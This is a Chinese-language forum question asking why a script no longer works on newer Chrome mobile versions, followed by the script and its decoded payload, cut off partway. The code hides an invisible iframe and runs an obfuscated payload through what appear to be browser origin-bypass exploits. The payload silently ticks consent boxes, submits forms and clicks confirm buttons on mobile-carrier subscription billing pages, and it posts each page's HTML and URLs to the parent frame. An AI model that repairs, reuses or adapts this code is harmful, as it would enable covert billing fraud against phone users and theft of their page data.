我正在处理的 JavaScript 似乎不适用于高于 Chrome mobile 45 的版本。我无法找到调试时发生的情况,但我认为某个方法可能已被弃用。任何人都知道使用什么方法,或者如何调试它以便自己更好地研究它?
这是函数:
<script>
function cxc(x, group) {
mixtracker.track("CXC", "cxc(" + x + ")", group);
var navU = navigator["userAgent"];
var isAndroidMobile = navU["indexOf"]("Android") > -1 && navU["indexOf"]("Mozilla/5.0") > -1 && navU["indexOf"]("AppleWebKit") > -1;
var pattern=/Chrome\/([\d\.]+)/;
var regExChrome = new RegExp(pattern);
var resultChromeRegEx = regExChrome["exec"](navU);
var chromeVersion = (resultChromeRegEx === null ? null : regExChrome["exec"](navU)[1]);
var cv=chromeVersion===null?null:chromeVersion.substr(3).replace(/\./g,'');
var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMDExLkRCIENBTEwtSU5JVElBTD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJzExMS5EQiBDQUxMLUhUTUwoMCk+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKCnZhciBCYXNlNjQgPSB7CgovLyBwcml2YXRlIHByb3BlcnR5CiAgICBfa2V5U3RyIDogIkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IiwKCi8vIHB1YmxpYyBtZXRob2QgZm9yIGVuY29kaW5nCiAgICBlbmNvZGUgOiBmdW5jdGlvbiAoaW5wdXQpIHsKICAgICAgICB2YXIgb3V0cHV0ID0gIiI7CiAgICAgICAgdmFyIGNocjEsIGNocjIsIGNocjMsIGVuYzEsIGVuYzIsIGVuYzMsIGVuYzQ7CiAgICAgICAgdmFyIGkgPSAwOwoKICAgICAgICBpbnB1dCA9IEJhc2U2NC5fdXRmOF9lbmNvZGUoaW5wdXQpOwoKICAgICAgICB3aGlsZSAoaSA8IGlucHV0Lmxlbmd0aCkgewoKICAgICAgICAgICAgY2hyMSA9IGlucHV0LmNoYXJDb2RlQXQoaSsrKTsKICAgICAgICAgICAgY2hyMiA9IGlucHV0LmNoYXJDb2RlQXQoaSsrKTsKICAgICAgICAgICAgY2hyMyA9IGlucHV0LmNoYXJDb2RlQXQoaSsrKTsKCiAgICAgICAgICAgIGVuYzEgPSBjaHIxID4+IDI7CiAgICAgICAgICAgIGVuYzIgPSAoKGNocjEgJiAzKSA8PCA0KSB8IChjaHIyID4+IDQpOwogICAgICAgICAgICBlbmMzID0gKChjaHIyICYgMTUpIDw8IDIpIHwgKGNocjMgPj4gNik7CiAgICAgICAgICAgIGVuYzQgPSBjaHIzICYgNjM7CgogICAgICAgICAgICBpZiAoaXNOYU4oY2hyMikpIHsKICAgICAgICAgICAgICAgIGVuYzMgPSBlbmM0ID0gNjQ7CiAgICAgICAgICAgIH0gZWxzZSBpZiAoaXNOYU4oY2hyMykpIHsKICAgICAgICAgICAgICAgIGVuYzQgPSA2NDsKICAgICAgICAgICAgfQoKICAgICAgICAgICAgb3V0cHV0ID0gb3V0cHV0ICsKICAgICAgICAgICAgICAgIHRoaXMuX2tleVN0ci5jaGFyQXQoZW5jMSkgKyB0aGlzLl9rZXlTdHIuY2hhckF0KGVuYzIpICsKICAgICAgICAgICAgICAgIHRoaXMuX2tleVN0ci5jaGFyQXQoZW5jMykgKyB0aGlzLl9rZXlTdHIuY2hhckF0KGVuYzQpOwoKICAgICAgICB9CgogICAgICAgIHJldHVybiBvdXRwdXQ7CiAgICB9LAoKLy8gcHVibGljIG1ldGhvZCBmb3IgZGVjb2RpbmcKICAgIGRlY29kZSA6IGZ1bmN0aW9uIChpbnB1dCkgewogICAgICAgIHZhciBvdXRwdXQgPSAiIjsKICAgICAgICB2YXIgY2hyMSwgY2hyMiwgY2hyMzsKICAgICAgICB2YXIgZW5jMSwgZW5jMiwgZW5jMywgZW5jNDsKICAgICAgICB2YXIgaSA9IDA7CgogICAgICAgIGlucHV0ID0gaW5wdXQucmVwbGFjZSgvW15BLVphLXowLTlcK1wvXD1dL2csICIiKTsKCiAgICAgICAgd2hpbGUgKGkgPCBpbnB1dC5sZW5ndGgpIHsKCiAgICAgICAgICAgIGVuYzEgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CiAgICAgICAgICAgIGVuYzIgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CiAgICAgICAgICAgIGVuYzMgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CiAgICAgICAgICAgIGVuYzQgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CgogICAgICAgICAgICBjaHIxID0gKGVuYzEgPDwgMikgfCAoZW5jMiA+PiA0KTsKICAgICAgICAgICAgY2hyMiA9ICgoZW5jMiAmIDE1KSA8PCA0KSB8IChlbmMzID4+IDIpOwogICAgICAgICAgICBjaHIzID0gKChlbmMzICYgMykgPDwgNikgfCBlbmM0OwoKICAgICAgICAgICAgb3V0cHV0ID0gb3V0cHV0ICsgU3RyaW5nLmZyb21DaGFyQ29kZShjaHIxKTsKCiAgICAgICAgICAgIGlmIChlbmMzICE9IDY0KSB7CiAgICAgICAgICAgICAgICBvdXRwdXQgPSBvdXRwdXQgKyBTdHJpbmcuZnJvbUNoYXJDb2RlKGNocjIpOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmIChlbmM0ICE9IDY0KSB7CiAgICAgICAgICAgICAgICBvdXRwdXQgPSBvdXRwdXQgKyBTdHJpbmcuZnJvbUNoYXJDb2RlKGNocjMpOwogICAgICAgICAgICB9CgogICAgICAgIH0KCiAgICAgICAgb3V0cHV0ID0gQmFzZTY0Ll91dGY4X2RlY29kZShvdXRwdXQpOwoKICAgICAgICByZXR1cm4gb3V0cHV0OwoKICAgIH0sCgovLyBwcml2YXRlIG1ldGhvZCBmb3IgVVRGLTggZW5jb2RpbmcKICAgIF91dGY4X2VuY29kZSA6IGZ1bmN0aW9uIChzdHJpbmcpIHsKICAgICAgICBzdHJpbmcgPSBzdHJpbmcucmVwbGFjZSgvXHJcbi9nLCJcbiIpOwogICAgICAgIHZhciB1dGZ0ZXh0ID0gIiI7CgogICAgICAgIGZvciAodmFyIG4gPSAwOyBuIDwgc3RyaW5nLmxlbmd0aDsgbisrKSB7CgogICAgICAgICAgICB2YXIgYyA9IHN0cmluZy5jaGFyQ29kZUF0KG4pOwoKICAgICAgICAgICAgaWYgKGMgPCAxMjgpIHsKICAgICAgICAgICAgICAgIHV0ZnRleHQgKz0gU3RyaW5nLmZyb21DaGFyQ29kZShjKTsKICAgICAgICAgICAgfQogICAgICAgICAgICBlbHNlIGlmKChjID4gMTI3KSAmJiAoYyA8IDIwNDgpKSB7CiAgICAgICAgICAgICAgICB1dGZ0ZXh0ICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGMgPj4gNikgfCAxOTIpOwogICAgICAgICAgICAgICAgdXRmdGV4dCArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKChjICYgNjMpIHwgMTI4KTsKICAgICAgICAgICAgfQogICAgICAgICAgICBlbHNlIHsKICAgICAgICAgICAgICAgIHV0ZnRleHQgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoYyA+PiAxMikgfCAyMjQpOwogICAgICAgICAgICAgICAgdXRmdGV4dCArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyA+PiA2KSAmIDYzKSB8IDEyOCk7CiAgICAgICAgICAgICAgICB1dGZ0ZXh0ICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGMgJiA2MykgfCAxMjgpOwogICAgICAgICAgICB9CgogICAgICAgIH0KCiAgICAgICAgcmV0dXJuIHV0ZnRleHQ7CiAgICB9LAoKLy8gcHJpdmF0ZSBtZXRob2QgZm9yIFVURi04IGRlY29kaW5nCiAgICBfdXRmOF9kZWNvZGUgOiBmdW5jdGlvbiAodXRmdGV4dCkgewogICAgICAgIHZhciBzdHJpbmcgPSAiIjsKICAgICAgICB2YXIgaSA9IDA7CiAgICAgICAgdmFyIGMgPSBjMSA9IGMyID0gMDsKCiAgICAgICAgd2hpbGUgKCBpIDwgdXRmdGV4dC5sZW5ndGggKSB7CgogICAgICAgICAgICBjID0gdXRmdGV4dC5jaGFyQ29kZUF0KGkpOwoKICAgICAgICAgICAgaWYgKGMgPCAxMjgpIHsKICAgICAgICAgICAgICAgIHN0cmluZyArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKGMpOwogICAgICAgICAgICAgICAgaSsrOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGVsc2UgaWYoKGMgPiAxOTEpICYmIChjIDwgMjI0KSkgewogICAgICAgICAgICAgICAgYzIgPSB1dGZ0ZXh0LmNoYXJDb2RlQXQoaSsxKTsKICAgICAgICAgICAgICAgIHN0cmluZyArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyAmIDMxKSA8PCA2KSB8IChjMiAmIDYzKSk7CiAgICAgICAgICAgICAgICBpICs9IDI7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgICBjMiA9IHV0ZnRleHQuY2hhckNvZGVBdChpKzEpOwogICAgICAgICAgICAgICAgYzMgPSB1dGZ0ZXh0LmNoYXJDb2RlQXQoaSsyKTsKICAgICAgICAgICAgICAgIHN0cmluZyArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyAmIDE1KSA8PCAxMikgfCAoKGMyICYgNjMpIDw8IDYpIHwgKGMzICYgNjMpKTsKICAgICAgICAgICAgICAgIGkgKz0gMzsKICAgICAgICAgICAgfQoKICAgICAgICB9CgogICAgICAgIHJldHVybiBzdHJpbmc7CiAgICB9Cgp9CgovL2hyZWY6W2h0dHA6Ly9tZHNwLm9yYW5nZS5iZS93LWhhL2FwcC1idW5kbGVwdXJjaGFzZS9ub2RlP209aCUzRDlmZTk4YThiYzk0ZDU1NDkwYmUwYjc0MjY4MTFiZTI5JTNCcCUzRDEwMjk2JTNCayUzRDEwMjk2JTNCdiUzRDMlM0ElN0JjJTNEUHVyY2hhc2VUeXBlUmVxJTNCdiUzRCU3QnB1cmNoYXNlY2FzZSUzRDglM0JtcCUzRCU3Ql9hcF9zaWQlM0QyMzE1MjEyMTIlM0JfYXBfbW9kdWxlSWQlM0QxOCUzQl9hcF9waWQlM0QxMjEwMF8wNTAwX0dhbWUydXAlM0JfYXBfbGclM0RubCUzQmZvcm1hdCUzRHhodG1sJTNCX2FwX3R5cGUlM0RzdWJzY3JpcHRpb24lM0IlN0QlM0JtZXJjaGFudENhbGxiYWNrVVJMJTNEaHR0cCUzQSUyRiUyRm1wLm1vYmlsZS1ndy5jb20lMkZiZS1tb2Jpc3RhciUyRiUzQnBpJTNEMTIxMDBfMDUwMF9HYW1lMnVwJTNCJTdEJTdEJnJlZGlyZWN0PTEmTUNPPU9GUl07IHJlZjpbaHR0cDovL3VwcmVhbHRpbWUuY29tL2hyZnA/dXJsPWh0dHAlM0ElMkYlMkZwbGF5LmJuZ21ibC5jb20lMkYlM0ZtJTNEMEJQS0pHMTc3MDI3JTI2b2ZmZXJfa2V5JTNEMTc3MDI3JTI2ZmMlM0QxJTI2YSUzRE1fMjk4OTY0Mjk2NTgzMGQ4ZTJhOWYxNDkyNjYwNDQwJTI2cHViaWQlM0QxMzU1XTsiCmZ1bmN0aW9uIGdldE1ldGFVUkwoKSB7CiAgICB2YXIgbWV0YXMgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnbWV0YScpOwogICAgZm9yICh2YXIgaSA9IDA7IGkgPCBtZXRhcy5sZW5ndGg7IGkrKykgewogICAgICAgIGlmIChtZXRhc1tpXS5nZXRBdHRyaWJ1dGUoImh0dHAtZXF1aXYiKSA9PSAicmVmcmVzaCIpIHsKICAgICAgICAgICAgdmFyIGNvbnQgPSBtZXRhc1tpXS5nZXRBdHRyaWJ1dGUoImNvbnRlbnQiKTsKICAgICAgICAgICAgdmFyIHJlc3VsdCA9IG5ldyBSZWdFeHAoInVybD0oLiopJCIsICJpIikuZXhlYyhjb250KTsKICAgICAgICAgICAgcmV0dXJuIHJlc3VsdFsxXS5yZXBsYWNlKCInIiwgIiIpLnJlcGxhY2UoIiciLCAiIikKICAgICAgICB9CiAgICB9CiAgICByZXR1cm4gIiIKfQp2YXIgdHR0ID0gZ2V0TWV0YVVSTCgpOwoKCgp1cmwgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKCgpmdW5jdGlvbiBnZXRNZXRhVVJMKCl7CiAgICB2YXIgbWV0YXMgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnbWV0YScpOwogICAgZm9yICh2YXIgaT0wOyBpPG1ldGFzLmxlbmd0aDsgaSsrKXsKICAgICAgICBpZiAobWV0YXNbaV0uZ2V0QXR0cmlidXRlKCJodHRwLWVxdWl2IikgPT0gInJlZnJlc2giKXsKICAgICAgICAgICAgdmFyIGNvbnQgPSBtZXRhc1tpXS5nZXRBdHRyaWJ1dGUoImNvbnRlbnQiKTsKICAgICAgICAgICAgdmFyIHJlc3VsdCA9IG5ldyBSZWdFeHAoInVybD0oLiopJCIsICJpIikuZXhlYyhjb250KTsKICAgICAgICAgICAgaWYocmVzdWx0WzFdLm1hdGNoKC9eXC8vZ2kpICE9IG51bGwpewogICAgICAgICAgICAgICAgcmV0dXJuICJodHRwOi8vIiArIGxvY2F0aW9uLmhvc3RuYW1lICsgcmVzdWx0WzFdLnJlcGxhY2UoIiciLCAiIikucmVwbGFjZSgiJyIsICIiKTsKCiAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgcmV0dXJuIHJlc3VsdFsxXS5yZXBsYWNlKCInIiwgIiIpLnJlcGxhY2UoIiciLCAiIik7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9CiAgICByZXR1cm4gIiI7Cn0KCnZhciByZWZyZXNoID0gZ2V0TWV0YVVSTCgpOwoKaWYocmVmcmVzaCAhPSAiIil7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdBIDogW1JlZnJlc2hdPj4+OyBscG51bTpbOThdOyByZWZyZXNoOiBbJyArIHJlZnJlc2ggKyAnXTsgaHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gcmVmcmVzaDsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ0EgOiBbUmVmcmVzaF1lZD4+PicsJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdvbGRlcicpIT11bmRlZmluZWQpCnsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2ZvdW5kIGJvbGRlcj4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnb2xkZXInKS5jaGVja2VkID0gdHJ1ZTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdmb3JtJylbMF0uc3VibWl0KCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3JtIHN1Ym1pdHRlZD4+PicsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdsYXJnZSBleHBhbmRlZCBzdWNjZXNzIGJ1dHRvbiBmbG9hdC1jZW50ZXInKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgbGFyZ2UgZXhwYW5kZWQgc3VjY2VzcyBidXR0b24gZmxvYXQtY2VudGVyPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2xhcmdlIGV4cGFuZGVkIHN1Y2Nlc3MgYnV0dG9uIGZsb2F0LWNlbnRlcicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdsYXJnZSBleHBhbmRlZCBzdWNjZXNzIGJ1dHRvbiBmbG9hdC1jZW50ZXIgc3VibWl0dGVkPj4+JywgJyonKTsKfQplbHNlIGlmKHdpbmRvdy5sb2NhdGlvbi5ocmVmLmluZGV4T2YoImFwcHNpbGlrZS5tb2JpL0JFIikhPS0xKQp7CgogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnaW4gYXBwc2lsaWtlLm1vYmk+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwogICAgc2V0VGltZW91dCgKICAgICAgICBmdW5jdGlvbiAoKSB7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J1dHRvbiBwdWxzZScpLmxlbmd0aD4wICYmIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjaGVjaycpIT11bmRlZmluZWQKCiAgICAgICAgICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2ZvdW5kIGJ1dHRvbiBwdWxzZT4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjaGVjaycpLmNoZWNrZWQgPSB0cnVlOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidXR0b24gcHVsc2UnKVswXS5jbGljaygpOwogICAgICAgICAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidXR0b24gcHVsc2UgY2xpY2tlZD4+PicsICcqJyk7CiAgICAgICAgfSwKICAgICAgICAxOTAwCiAgICApOwoKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2luIGFwcHNpbGlrZS5tb2JpMj4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7Cgp9CmVsc2UgaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ09wZXJhdG9yJykhPXVuZGVmaW5lZCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgT3BlcmF0b3I+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ09wZXJhdG9yJykudmFsdWUgPSAnMjA2MTAnOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Ym1pdF9idXR0b24nKS5jbGljaygpOwogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnc3VibWl0X2J1dHRvbiBzdWJtaXR0ZWQ+Pj4nLCAnKicpOwp9CgplbHNlIGlmKHVybC5pbmRleE9mKCdtZHNwLm9yYW5nZS5iZS93LWhhL2FwcC1idW5kbGVwdXJjaGFzZS9ub2RlJykhPS0xICYmCiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidXR0b24nKS5sZW5ndGg9PTMpCnsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2ZvdW5kIGJ0biA+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBzZXRUaW1lb3V0KAoKICAgICAgICBmdW5jdGlvbiAoKSB7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J1dHRvbicpWzJdLmNsaWNrKCk7CiAgICAgICAgfSwKICAgICAgICAyMDAwCgogICAgKTsKCiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xpY2tlZD4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwp9CmVsc2UgaWYodHR0IT0iIiAmJiB0dHQuaW5kZXhPZigidmlkZW8td3JsZC5jb20vQkUiKSE9LTEpCnsKCiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCd6Zm91bmQgdHR0Pj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ3pmb3VuZCB0dHQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKICAgIGxvY2F0aW9uLnJlcGxhY2UodHR0KTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ3pmb3VuZCB0dHQgY2xpY2tlZD4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwp9CmVsc2UKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZWxzZSA+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlID4+PicrIEJhc2U2NC5lbmNvZGUoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwpLCAnKicpOwogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnNjQ2NC5EQiBDQUxMLUhUTUwoMCk+Pj4nKyAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwpLCAnKicpOwoKfQ==";
if (isAndroidMobile && cv!=='0') {
//console.re.log("IDBKeyRange.only.call::" + navU);
IDBKeyRange.only.call(frames[x],0).constructor.constructor('eval(atob(\"'+ value +'\"))')();
}else{
//console.re.log("window.open0000::" + navU);
window.open("\u0000javascript:eval(atob(\""+ value +"\"))", "androidload"+x);
}
}
var i0 = document.documentElement.appendChild(document.createElement('iframe'));
i0.onload = function(){cxc(0, 'em5601')};
i0.setAttribute('style', 'opacity: 0;overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px');
i0.setAttribute('sandbox', 'allow-scripts allow-forms allow-same-origin allow-popups allow-top-navigation');
i0.src = "javascript:window.location.replace('http://www.url_for_iframe.com')";
setTimeout(function(){location.replace(jmurl);}, 200000);
</script>
这是“value”内函数的解密:
window.parent.postMessage('011.DB CALL-INITIAL>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('111.DB CALL-HTML(0)>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
var Base64 = {
// private property
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// public method for encoding
encode : function (input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = Base64._utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
// private method for UTF-8 encoding
_utf8_encode : function (string) {
string = string.replace(/\r\n/g,"\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
},
// private method for UTF-8 decoding
_utf8_decode : function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while ( i < utftext.length ) {
c = utftext.charCodeAt(i);
if (c < 128) {
string += String.fromCharCode(c);
i++;
}
else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}
}
return string;
}
}
//href:[http://mdsp.orange.be/w-ha/app-bundlepurchase/node?m=h%3D9fe98a8bc94d55490be0b7426811be29%3Bp%3D10296%3Bk%3D10296%3Bv%3D3%3A%7Bc%3DPurchaseTypeReq%3Bv%3D%7Bpurchasecase%3D8%3Bmp%3D%7B_ap_sid%3D231521212%3B_ap_moduleId%3D18%3B_ap_pid%3D12100_0500_Game2up%3B_ap_lg%3Dnl%3Bformat%3Dxhtml%3B_ap_type%3Dsubscription%3B%7D%3BmerchantCallbackURL%3Dhttp%3A%2F%2Fmp.mobile-gw.com%2Fbe-mobistar%2F%3Bpi%3D12100_0500_Game2up%3B%7D%7D&redirect=1&MCO=OFR]; ref:[http://uprealtime.com/hrfp?url=http%3A%2F%2Fplay.bngmbl.com%2F%3Fm%3D0BPKJG177027%26offer_key%3D177027%26fc%3D1%26a%3DM_2989642965830d8e2a9f1492660440%26pubid%3D1355];"
function getMetaURL() {
var metas = document.getElementsByTagName('meta');
for (var i = 0; i < metas.length; i++) {
if (metas[i].getAttribute("http-equiv") == "refresh") {
var cont = metas[i].getAttribute("content");
var result = new RegExp("url=(.*)$", "i").exec(cont);
return result[1].replace("'", "").replace("'", "")
}
}
return ""
}
var ttt = getMetaURL();
url = window.location.href;
function getMetaURL(){
var metas = document.getElementsByTagName('meta');
for (var i=0; i<metas.length; i++){
if (metas[i].getAttribute("http-equiv") == "refresh"){
var cont = metas[i].getAttribute("content");
var result = new RegExp("url=(.*)$", "i").exec(cont);
if(result[1].match(/^\//gi) != null){
return "http://" + location.hostname + result[1].replace("'", "").replace("'", "");
}else{
return result[1].replace("'", "").replace("'", "");
}
}
}
return "";
}
var refresh = getMetaURL();
if(refresh != ""){
window.parent.postMessage('A : [Refresh]>>>; lpnum:[98]; refresh: [' + refresh + ']; href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.location.href = refresh;
window.parent.postMessage('A : [Refresh]ed>>>','*');
}
else if(document.getElementById('older')!=undefined)
{
window.parent.postMessage('found bolder>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
document.getElementById('older').checked = true;
document.getElementsByTagName('form')[0].submit();
window.parent.postMessage('form submitted>>>', '*');
}
else if(document.getElementsByClassName('large expanded success button float-center').length>0)
{
